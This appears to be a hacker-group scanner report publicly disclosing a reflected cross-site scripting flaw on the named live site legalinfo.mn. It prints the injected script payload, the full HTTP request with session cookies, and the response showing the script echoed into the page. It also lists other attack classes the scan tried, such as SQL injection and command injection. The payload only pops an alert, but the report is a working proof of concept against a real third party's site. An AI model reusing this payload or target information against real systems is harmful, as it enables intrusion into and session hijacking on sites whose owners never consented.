Legalinfo.mn XSS CROSS SITE SCRIPTING
Detected vulnerability : XSS
Vulnerabilities : Important 22% Low 38% Information 39%
Scan details :
SQL Injection, SQL Injection (Boolean), SQL
Injection (Blind), Cross-site Scripting,
Command Injection, Command Injection (Blind),
Local File Inclusion, Remote File Inclusion,
Remote Code Evaluation, HTTP Header Injection,
Open Redirection, Expression Language
Injection, Web App Fingerprint, RoR Code
Execution, WebDAV
Vulnerability information : http://en.wikipedia.org/wiki/Cross-site_scripting
Verified parameter
Parameter Type Value
URI-BASED Full URL '"--></style></scRipt>
<scRipt>alert(X-code™ by Zev1337)</scRipt>
Request
GET /news/159'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3EGotivism(0x0003BA)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Referer: http://www.legalinfo.mn/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Gotivism)
Accept-Language: en-us,en;q=0.5
X-Scanner: Gotivism
Host: www.legalinfo.mn
Cookie: cd2c89acf4e6e28f300ba7d00a7d9a9f=j4ar7s99uoo7brkbslb3drdc91; PHPSESSID=ei2t1sgfrpgomd36m82pvjmnk2
Accept-Encoding: gzip, deflate
Response
…
/span>, <span class="tsaaral">5</span>, <span class="tsaaral">6</span>, <span class="tsaaral">7</span>, <span class="tsaaral">8</span>, <span class="tsaaral">9</span>, <a
class="wblue" href="/news/159'"--></style></scRipt><scRipt>Gotivism 1.0(X-code™ by Zev1337)</scRipt>?filter=all">Бүгд</a><br /><br />
<!--<input name="sdate" id="sdate" value=""/> -->
<!--<input name="edate" id="edate" value=""/><br /><br /> -->
<div id="mright">
<…
